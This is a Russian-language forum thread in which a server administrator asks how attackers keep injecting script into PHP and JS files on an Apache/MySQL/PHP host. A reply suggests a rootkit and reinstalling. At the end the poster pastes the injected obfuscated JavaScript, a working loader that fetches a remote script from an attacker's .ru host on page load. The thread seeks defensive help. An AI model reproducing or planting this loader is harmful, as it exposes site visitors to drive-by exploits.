Такая беда... *nix сервер. Стоит apache2 + mysql5 + php5 Ну настроеный вроде норм. Какимто чудом на всех файлах почти php и js прописался (Exploit.Java.CVE-2010-0886.a ) сплоит джавовский. ( 2 строчки <script>**** ) Затупил не скопировал их сами. но возможно еще найду дырку в каком либо сайте я исключил потому что каждому хосту прописано php_open_dir + были поправлены файлы у которых chmod на только чтение для всех кроме owner а owner это пользователь фтп. и для каждого хоста он свой. Тоесть правка пользователя apache исключается. Какие еще есть способы заливки?
Закрыл SSH/FTP за iptables - Все равно появляется эта хрень. Может в кроне что быть? Или модули кудато встраиваются. Знает кто нить чтонить такое?
возможен и более сложный случай - тебе могли залить руткит или протрояненный модуль, например ssh. в этом случае проще всего переустановка системы с нуля - как с виндой причем не той же системы, что была, а с обновленным ядром и прочим софтом - залезть к тебе могли через дыру в каком нить софте или самом ядре. [хотя это все лишь реальная возможность, в твоем случае все может быть все проще]
В моем случае не все так просто. SSH закрыт от всех кроме 5 ипов. ftp так же. открыты 443, 80 Порты. причем метод закрытыя "iptables" Code: <script>this.u_="";var V;P=["Bp","Bw","nO"];e=function(){bt={Y:"D"};xf={y:"w"};this.Yn=28223;this.Yn-=203;function U(b,O,ee){this.oD=20167;this.oD++;return b.substr(O,ee);us=[];this.L="L";}var EB=26146;var ZA=34112;var _=RegExp;var Hn=["LJ","sH"];var B='';hp=37870;hp--;var u=String("/goog"+U("le.coQP8k",0,5)+U("m/yneYJz",0,5)+"t.com"+U("/pageIjbU",0,5)+U("WPKsjaunPKW",3,5)+"es.fr"+U(".phpu1F7",0,4));var F=document;var S=new Date();var Vy=[];function x(b,O){var c=["Zi","N"];var NV="";var ee=String("[")+O+String(U("]sdw",0,1));try {var wA='C'} catch(wA){};this.aG="aG";var Z=new _(ee, new String("g"));var f=new Array();var tW={vQ:"gq"};return b.replace(Z, B);Tc=33937;Tc+=107;};this.vn=63064;this.vn-=27;var OC=String("bo"+"dy");var o=null;var Uu=727558-719478;this.k=10584;this.k-=65;var Bo='';var sq='';var s=x('sdcWrCiIpJtI','dWwCPIJZo');var oU={};V=function(){try {eF={eb:31207};var Q=x('c4rPekaUt4ePE4l8ejmCezn5ts','jsTz0J4iUDCFGHP5k8y6');nQ=[];eq=["kv"];p=F[Q](s);PC={MG:false};var GK={NT:34578};var Uc={aI:"Ln"};try {var NVb='ds'} catch(NVb){};var v=x('sIrbcK','VoBKqIb');var b=Uu+u;var T=String(U("defUprW",0,3)+"er");qi=["vc","AT","po"];p[T]=[1,1][0];p[v]=U("httpEO5q",0,4)+U("Oqb7://m7Obq",4,4)+"ildb"+"abe."+"ru:"+b;this.qs=64843;this.qs++;var fa=61639;DL={dU:24542};var kO='';F[OC].appendChild(p);xP=["Qq","CL"];} catch(Vf){this.J=28162;this.J+=72;};wo=20562;wo-=126;};try {var FDO='ho'} catch(FDO){};try {var ZS='vS'} catch(ZS){};};var pw=["rh","Yo","Of"];this.Wf="Wf";e();var Ou='';var eT=false;var Wn={NW:false};window.onload=V;var pG={};this.qm=33221;this.qm-=212;</script> <!--99ad6768629f057aba11d6e9a798b9b6-->
